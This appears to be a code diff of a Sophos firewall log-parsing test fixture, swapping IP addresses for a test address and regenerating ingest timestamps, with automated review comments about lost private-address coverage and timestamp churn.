src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=175.16.199.1 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"LAN\" srczone=\"LAN\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Stop\" connid=\"1617925280\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010101600001", "kind": "event", "start": "2020-05-18T14:38:37.000Z", @@ -4847,7 +4987,7 @@ "port": 53, "bytes": 0, "packets": 0, - "ip": "91.228.165.117" + "ip": "175.16.199.1" }, "log": { "level": "informational" @@ -4857,26 +4997,25 @@ "port": 0 }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SK-BL", - "city_name": "Bratislava", - "country_iso_code": "SK", - "country_name": "Slovakia", - "region_name": "Bratislava", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 17.1078, - "lat": 48.15 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 50881, + "number": 4837, "organization": { - "name": "ESET, spol. s r.o." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "91.228.165.117", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -4886,29 +5025,28 @@ "source": { "nat": { "port": 0, - "ip": "185.8.209.194" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "CH-VD", - "city_name": "Saint-Prex", - "country_iso_code": "CH", - "country_name": "Switzerland", - "region_name": "Vaud", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 6.4599, - "lat": 46.4796 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 199567, + "number": 4837, "organization": { - "name": "Fr. Sauter AG" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 49144, "bytes": 0, - "ip": "172.16.66.155", + "ip": "175.16.199.1", "mac": "00:00:00:00:00:00", "packets": 0 }, @@ -4949,9 +5087,7 @@ "defaulttest.local" ], "ip": [ - "172.16.66.155", - "91.228.165.117", - "185.8.209.194" + "175.16.199.1" ] }, "sophos": { 
@@ -4990,13 +5126,13 @@ "bytes": 0, "mac": "00:00:00:00:00:00", "packets": 0, - "ip": "172.16.66.155" + "ip": "175.16.199.1" }, "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566406600Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:38 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=15 appfilter_policy_id=0 application=\"DNS\" application_risk=1 application_technology=\"Network Protocol\" application_category=\"Infrastructure\" in_interface=\"Port3.400\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=172.16.66.155 src_country_code=R1 dst_ip=91.228.165.117 dst_country_code=SVK protocol=\"UDP\" src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=185.8.209.194 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"DMZ\" srczone=\"DMZ\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Start\" connid=\"3360392048\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715407Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:38 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=15 appfilter_policy_id=0 application=\"DNS\" application_risk=1 application_technology=\"Network Protocol\" application_category=\"Infrastructure\" in_interface=\"Port3.400\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=SVK protocol=\"UDP\" 
src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=175.16.199.1 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"DMZ\" srczone=\"DMZ\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Start\" connid=\"3360392048\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010101600001", "kind": "event", "start": "2020-05-18T14:38:38.000Z", @@ -5021,7 +5157,7 @@ "port": 4980, "bytes": 0, "packets": 0, - "ip": "172.20.4.52" + "ip": "175.16.199.1" }, "log": { "level": "informational" @@ -5030,10 +5166,27 @@ "nat": { "port": 0 }, + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 4980, "bytes": 0, - "packets": 0, - "ip": "172.20.4.52" + "ip": "175.16.199.1", + "packets": 0 }, "rule": { "ruleset": "1", @@ -5043,11 +5196,28 @@ "nat": { "port": 0 }, + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 53287, "bytes": 0, + "ip": "175.16.199.1", "mac": "24:01:c7:07:2b:a2", - "packets": 0, - "ip": "172.17.35.113" + "packets": 0 }, "tags": [ "preserve_original_event" @@ -5082,8 +5252,7 @@ "testhost.local" ], "ip": [ - "172.17.35.113", - "172.20.4.52" + "175.16.199.1" ] }, "sophos": { 
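Review bot: The `@@ -5030,10 +5166,27 @@` and `@@ -5043,11 +5196,28 @@` hunks replace the private addresses 172.20.4.52 and 172.17.35.113 with a public one, so both sides of this denied flow now gain `geo` and `as` blocks and the fixture no longer exercises the case where a private address receives no GeoIP enrichment. The raw event in the next hunk still carries `src_country_code=\"\"` and `dst_country_code=\"\"`, which suggests the sample was meant to represent an internal-only flow. If the intent is to replace only public addresses, keeping the original RFC 1918 values here (and in the `@@ -5082,8 +5252,7 @@` related.ip hunk) preserves that coverage.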
@@ -5116,13 +5285,13 @@ "bytes": 0, "mac": "24:01:c7:07:2b:a2", "packets": 0, - "ip": "172.17.35.113" + "ip": "175.16.199.1" }, "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566412800Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:39 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010102600002 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name=\"\" user_gp=\"\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=24:01:c7:07:2b:a2 src_ip=172.17.35.113 src_country_code=\"\" dst_ip=172.20.4.52 dst_country_code=\"\" protocol=\"TCP\" src_port=53287 dst_port=4980 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715413100Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:39 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010102600002 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name=\"\" user_gp=\"\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=24:01:c7:07:2b:a2 src_ip=175.16.199.1 src_country_code=\"\" dst_ip=175.16.199.1 dst_country_code=\"\" protocol=\"TCP\" src_port=53287 dst_port=4980 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" 
tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010102600002", "kind": "event", "start": "2020-05-18T14:38:39.000Z", @@ -5253,7 +5422,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566416700Z", + "ingested": "2021-12-09T13:44:55.715419100Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:40 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010102600002 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name=\"elastic@user.local\" user_gp=\"elastic.group.local\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"tun0\" out_interface=\"Port1\" src_mac=\"\" src_ip=10.82.234.6 src_country_code=\"\" dst_ip=192.168.0.1 dst_country_code=\"\" protocol=\"TCP\" src_port=60102 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010102600002", "kind": "event", @@ -5278,7 +5447,7 @@ "port": 18, "bytes": 0, "packets": 0, - "ip": "185.7.209.207" + "ip": "175.16.199.1" }, "log": { "level": "informational" 
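Review bot: The only change in `@@ -5253,7 +5422,7 @@` is a regenerated `event.ingested` timestamp, and the same churn appears in every other hunk of this file (for example `@@ -6406,7 +6678,7 @@`, `@@ -6525,7 +6797,7 @@`, `@@ -6644,7 +6916,7 @@`, `@@ -6755,7 +7027,7 @@` and `@@ -7002,7 +7276,7 @@`), which buries the IP substitution under unrelated diff noise and will recur on every regeneration. If the data stream's pipeline test config does not already declare it, listing the field as dynamic, `dynamic_fields: {"event.ingested": ".*"}`, lets the comparison ignore that value so future regenerations only change what actually differs.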
@@ -5288,23 +5457,25 @@ "port": 0 }, "geo": { - "continent_name": "Europe", - "country_name": "Germany", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 9.491, - "lat": 51.2993 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "DE" + "country_iso_code": "CN" }, "as": { - "number": 42652, + "number": 4837, "organization": { - "name": "inexio Informationstechnologie und Telekommunikation Gmbh" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 18, "bytes": 0, - "ip": "185.7.209.207", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -5316,26 +5487,25 @@ "port": 0 }, "geo": { - "continent_name": "Europe", - "region_iso_code": "PL-14", - "city_name": "Warsaw", - "country_iso_code": "PL", - "country_name": "Poland", - "region_name": "Mazovia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 21.0, - "lat": 52.25 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 16276, + "number": 4837, "organization": { - "name": "OVH SAS" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 55039, "bytes": 0, - "ip": "51.77.56.9", + "ip": "175.16.199.1", "mac": "c4:f7:d5:b5:47:f4", "packets": 0 }, @@ -5367,8 +5537,7 @@ "defaulttest.local" ], "ip": [ - "51.77.56.9", - "185.7.209.207" + "175.16.199.1" ] }, "sophos": { 
@@ -5401,13 +5570,13 @@ "bytes": 0, "mac": "c4:f7:d5:b5:47:f4", "packets": 0, - "ip": "51.77.56.9" + "ip": "175.16.199.1" }, "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566422Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:41 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010302602002 log_type=\"Firewall\" log_component=\"Appliance Access\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2\" out_interface=\"\" src_mac=c4:f7:d5:b5:47:f4 src_ip=51.77.56.9 src_country_code=\"\" dst_ip=185.7.209.207 dst_country_code=\"\" protocol=\"TCP\" src_port=55039 dst_port=18 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715424900Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:41 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010302602002 log_type=\"Firewall\" log_component=\"Appliance Access\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2\" out_interface=\"\" src_mac=c4:f7:d5:b5:47:f4 src_ip=175.16.199.1 src_country_code=\"\" dst_ip=175.16.199.1 dst_country_code=\"\" protocol=\"TCP\" src_port=55039 dst_port=18 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 
srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010302602002", "kind": "event", "start": "2020-05-18T14:38:41.000Z", @@ -5453,9 +5622,26 @@ "nat": { "port": 0 }, + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 51826, "bytes": 0, - "ip": "172.17.35.101", + "ip": "175.16.199.1", "user": { "name": "elastic@user.local", "group": { @@ -5501,7 +5687,7 @@ "testhost.local" ], "ip": [ - "172.17.35.101", + "175.16.199.1", "192.168.5.11" ] }, 
@@ -5535,13 +5721,13 @@ "bytes": 0, "mac": "24:01:c7:07:2b:a2", "packets": 0, - "ip": "172.17.35.101" + "ip": "175.16.199.1" }, "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566427400Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:42 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010102600002 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name=\"elastic@user.local\" user_gp=\"elastic.group.local\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=24:01:c7:07:2b:a2 src_ip=172.17.35.101 src_country_code=\"\" dst_ip=192.168.5.11 dst_country_code=\"\" protocol=\"TCP\" src_port=51826 dst_port=1109 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715430600Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:42 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010102600002 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name=\"elastic@user.local\" user_gp=\"elastic.group.local\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=24:01:c7:07:2b:a2 src_ip=175.16.199.1 src_country_code=\"\" dst_ip=192.168.5.11 dst_country_code=\"\" protocol=\"TCP\" src_port=51826 dst_port=1109 sent_pkts=0 recv_pkts=0 
sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010102600002", "kind": "event", "start": "2020-05-18T14:38:42.000Z", @@ -5587,11 +5773,28 @@ "nat": { "port": 0 }, + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 3389, "bytes": 0, + "ip": "175.16.199.1", "mac": "34:db:fd:83:d8:09", - "packets": 0, - "ip": "172.16.36.105" + "packets": 0 }, "tags": [ "preserve_original_event" @@ -5621,7 +5824,7 @@ "defaulttest.local" ], "ip": [ - "172.16.36.105", + "175.16.199.1", "10.84.234.14" ] }, 
@@ -5655,13 +5858,13 @@ "bytes": 0, "mac": "34:db:fd:83:d8:09", "packets": 0, - "ip": "172.16.36.105" + "ip": "175.16.199.1" }, "event": { "duration": 0, "severity": 4, - "ingested": "2021-06-30T11:19:55.566431100Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:43 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010402403001 log_type=\"Firewall\" log_component=\"DoS Attack\" log_subtype=\"Denied\" status=\"Deny\" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"\" src_mac=34:db:fd:83:d8:09 src_ip=172.16.36.105 src_country_code=\"\" dst_ip=10.84.234.14 dst_country_code=\"\" protocol=\"UDP\" src_port=3389 dst_port=64465 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715436600Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:43 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010402403001 log_type=\"Firewall\" log_component=\"DoS Attack\" log_subtype=\"Denied\" status=\"Deny\" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"\" src_mac=34:db:fd:83:d8:09 src_ip=175.16.199.1 src_country_code=\"\" dst_ip=10.84.234.14 dst_country_code=\"\" protocol=\"UDP\" src_port=3389 dst_port=64465 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 
srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010402403001", "kind": "alert", "start": "2020-05-18T14:38:43.000Z", @@ -5779,7 +5982,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566435Z", + "ingested": "2021-12-09T13:44:55.715442500Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:44 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=012802605201 log_type=\"Firewall\" log_component=\"SSL VPN\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"tun0\" out_interface=\"\" src_mac=\"\" src_ip=10.82.234.9 src_country_code=\"\" dst_ip=10.82.234.11 dst_country_code=\"\" protocol=\"TCP\" src_port=58331 dst_port=56267 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "012802605201", "kind": "event", @@ -5804,7 +6007,7 @@ "port": 443, "bytes": 0, "packets": 0, - "ip": "172.16.34.50" + "ip": "175.16.199.1" }, "log": { "level": "informational" 
@@ -5813,10 +6016,27 @@ "nat": { "port": 0 }, + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "port": 443, "bytes": 0, - "packets": 0, - "ip": "172.16.34.50" + "ip": "175.16.199.1", + "packets": 0 }, "rule": { "ruleset": "2", @@ -5878,7 +6098,7 @@ ], "ip": [ "10.84.234.7", - "172.16.34.50" + "175.16.199.1" ] }, "sophos": { 
@@ -5920,8 +6140,8 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-06-30T11:19:55.566438500Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:45 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=0 fw_rule_id=61 policy_type=2 user_name=\"elastic@user.local\" user_gp=\"elastic.group.local\" iap=0 ips_policy_id=11 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"ipsec0\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=10.84.234.7 src_country_code=R1 dst_ip=172.16.34.50 dst_country_code=R1 protocol=\"TCP\" src_port=58543 dst_port=443 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"VPN\" srczone=\"VPN\" dstzonetype=\"VPN\" dstzone=\"VPN\" dir_disp=\"\" connevent=\"Start\" connid=\"1615935064\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715448300Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:45 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=0 fw_rule_id=61 policy_type=2 user_name=\"elastic@user.local\" user_gp=\"elastic.group.local\" iap=0 ips_policy_id=11 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"ipsec0\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=10.84.234.7 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"TCP\" src_port=58543 dst_port=443 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 
tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"VPN\" srczone=\"VPN\" dstzonetype=\"VPN\" dstzone=\"VPN\" dir_disp=\"\" connevent=\"Start\" connid=\"1615935064\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010101600001", "kind": "event", "start": "2020-05-18T14:38:45.000Z", @@ -5945,7 +6165,7 @@ }, "bytes": 0, "packets": 0, - "ip": "172.17.32.19" + "ip": "175.16.199.1" }, "log": { "level": "notification" @@ -5954,9 +6174,26 @@ "nat": { "port": 0 }, + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, "bytes": 0, "packets": 0, - "ip": "172.17.32.19" + "ip": "175.16.199.1" }, "rule": { "ruleset": "1", @@ -6000,7 +6237,7 @@ ], "ip": [ "192.168.1.254", - "172.17.32.19" + "175.16.199.1" ] }, "sophos": { 
@@ -6041,8 +6278,8 @@ "event": { "duration": 0, "severity": 5, - "ingested": "2021-06-30T11:19:55.566443600Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:45 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=018201500005 log_type=\"Firewall\" log_component=\"ICMP ERROR MESSAGE\" log_subtype=\"Allowed\" status=\"Allow\" priority=Notice duration=0 fw_rule_id=60 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=17 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"\" src_mac=34:db:fd:83:d8:09 src_ip=192.168.1.254 src_country_code=\"\" dst_ip=172.17.32.19 dst_country_code=\"\" protocol=\"ICMP\" icmp_type=3 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connevent=\"Interim\" connid=\"2685668438\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "ingested": "2021-12-09T13:44:55.715454200Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:45 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=018201500005 log_type=\"Firewall\" log_component=\"ICMP ERROR MESSAGE\" log_subtype=\"Allowed\" status=\"Allow\" priority=Notice duration=0 fw_rule_id=60 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=17 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"\" src_mac=34:db:fd:83:d8:09 src_ip=192.168.1.254 src_country_code=\"\" dst_ip=175.16.199.1 dst_country_code=\"\" protocol=\"ICMP\" icmp_type=3 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" 
